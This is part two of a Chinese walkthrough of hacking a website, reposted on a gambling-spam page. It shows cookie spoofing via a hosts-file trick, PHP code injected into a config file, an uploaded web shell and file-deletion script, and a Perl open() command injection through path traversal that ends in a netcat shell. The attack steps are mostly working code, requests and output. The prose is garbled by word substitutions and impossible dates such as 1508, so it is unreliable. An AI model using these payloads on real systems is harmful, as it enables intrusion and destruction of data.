剑走偏锋之灵巧的脚本注入方式(2)

  • 时间:
  • 浏览:0
  • 来源:1分快3官网平台_1分快3网投平台_1分快3投注平台_1分快3娱乐平台





作者: 论坛收集 zdnet网络安全

CNETNews.com.cn

1508-01-12 15:26:36

关键词: 网络安全 攻击防范 入侵

完整篇 还还要进行一次cookie欺骗。一群人这里使用的是并有的是比较烦琐的最好的办法 :先断开网络,将一群人的IP改为target.org的IP,怎么让在%systemroot%system32driversetchosts文件里把www.target.org这名 域名指向target.org的IP,做这名 步是为了一群人在断开网络的后后不能成功的将www.target.org解析成它的IP.最后在一群人的IIS后面 自已建还有一个 虚拟目录/~shuaishuai/down_sys/admin/写还有一个 asp文件,把cookie设置为管理员的用户名和加过密的密码,asp文件内容如下:

以下是代码片段:

<%

response.cookies("bymid")="adminuser"

response.cookies("bympwd")="596a96cc7bf91abcd896f33c44aedc8a"

%>

怎么让访问这名 asp文件

http://www.target.org/~shuaishuai/down_sys/admin/cookie.asp

留着这名 窗口,把IP改回为从前的192.168.0.1,接着用这名 窗口请求

http://www.target.org/~shuaishuai/down_sys/admin/admin.php

管理界面出来了,通过了验证。接着一群人来上传文件...可下面的事让一群人懊恼了了吗,竟然那末上传文件的功能,Fiant,是还有一个 没开发完整篇 的半成品,彻底失望了吗? 不,一群人依然有信心,接着查看一下或多或少的文件,看看还还要对配置文件动点手脚,一群人找到了还有一个 class.php,后面 保存的是下载系统的或多或少软件分类信息,内容看起来像从前:

5|安全工具|1028372222

8|红客工具|1034038173

7|其它软件|1034202097

....

一群人试着往后面 写东西,于是在管理页面新加上还有一个 主分类,分类的名称为"<?copy ($a,$b);unlink($a);?>",提交后后class.php变成了从前

5|安全工具|1028372222

8|红客工具|1034038173

7|其它软件|1034202097

9|<?copy($a,$b);unlink($a);?>|10540351504

这名 php文件还还要让一群人上传文件到有权限目录和删除有权限删除的文件。于是一群人在本地写了还有一个 表单,上传还有一个 phpshell上去,怎么让访问

http://www.target.org/~shuaishuai/down_sys/data/sh.php

GOOD,返回了phpshell的界面...一阵高兴后后,一群人才发现这名 phpshell有哪些命令有的是能执行,从前网站PHP打开了safe_mode功能,限制一群人执行命令。但一群人怎么让有了很大的突破了,还还要向服务器上传文件了。接下来一群人利用PHP雄厚的内置函数写了要是小脚本上传测试,很不幸,系统利用 disable_functions 禁止了大每种的文件系统函数、目录函数...好在并那末赶尽杀绝,最后一群人写了下面还有一个 php程序来查看或多或少有权限查看的目录和文件:

以下是代码片段:

<?

$c = $HTTP_GET_VARS["c"];

$f = $HTTP_GET_VARS["f"];

if($c=="file") {

$file=readfile($f);

echo $file;

}

if($c=="dir") {

$h=opendir($f);

while($file=readdir($h)) {

echo "$file ";

}

}

if($c=="del") {

unlink($f);

}

?>

在做了要是尝试后后,一群人发现在PHP不还可以 获得新的突破,好在一群人还还要利用后面 那个php程序来查看www.target.org/cgi-bin/club/scripts/ 目录中程序脚本的完整篇 的代码,于是一群人决定改向回到起点、查看CGI文件,怎么让那末权限向可执行CGI程序的目录里写文件, 新写还有一个 CGI程序来执行命令是不现实的,要是决定利用现有的.pl程序来插入命令,目标自然是放上去perl的open函数上,于是一群人后后后后开始查找有哪些程序用了open函数,但找了好多.pl文件,都那末发现,但却看一遍有好多readfile()函数,记得perl后面 是那末这名 函数的,但这里却用了要是readfile(),为有哪些呢?这肯定是一群人自已定义的还有一个 函数,一群人看一遍每还有一个 .pl文件前几行有的是还有一个 use Club;从前这里有个模块,于是查看Club.pm,更快便发现了open函数.

以下是代码片段:

sub readkey {

my($file)=@_;

unless(open(FH,"$file")) {

errmsg("对不起!你超时了,请<a href="$login_page" target="_parent">重新登陆</a>");

exit;

}

unless(flock(FH,LOCK_SH)) {

errmsg("Can’t Lock File: $file");

}

my $data = <FH>;

close(FH);

return $data;

}

这要是那个自定义的readfile函数,证实了一群人的猜想,怎么让也找到了还有一个 符合要求的open函数,接着搜寻哪个文件调用了这名 函数,更快一群人在change_pw.pl这名 程序里找到了这名 函数调用,这名 程序用来修改用户的密码,不幸的是代码在判断用户旧密码是与非 正确前就调用了 readkey() 函数:

my $key_info=readkey("$key_dir/$key");

于是提交

http://www.target.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

再查看一下

http://www.target.org/cgi-bin/club/scripts/bbb

Yeah!成功执行了...出显了一群人期望的结果,这我我觉得 太妙了,还还要利用这名 来执行命令,就相当于得到了还有一个 shell。但从前办事毕竟不方便,不能 及时地查看一群人的运行结果。怎么让一群人又上传了还有一个 文件、编译、执行,怎么让

D: emp>nc -vv www.target.org 12345

www.target.org [211.161.57.29] 12345 (?) open

id

uid=150(www) gid=150(www) groups=150(www)

uname -a

FreeBSD ns8.target.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr 2 07:01:40 CST 1503 

root@ns8.target.com:/usr/obj/usr/src/sys/target i386

哦,是FreeBSD 4.8-RELEASE,版本很高,提升权限比较困难,一群人找了了吗都那末找到有效的local exploit,提升权限失败,只好作罢。

到这里,一群人的hacking基本上后后后后开始了。我我觉得没拿到root,但相当于拿到了网站WEB权限,对于一群人CGI安全爱好者来说,应该与非 完成了本职工作吧-)。后后一群人那末快与站主联系,提醒他网站处在安全隐患,但站主并那末向一群人询问细节,他个人通过分析日志修复了漏洞。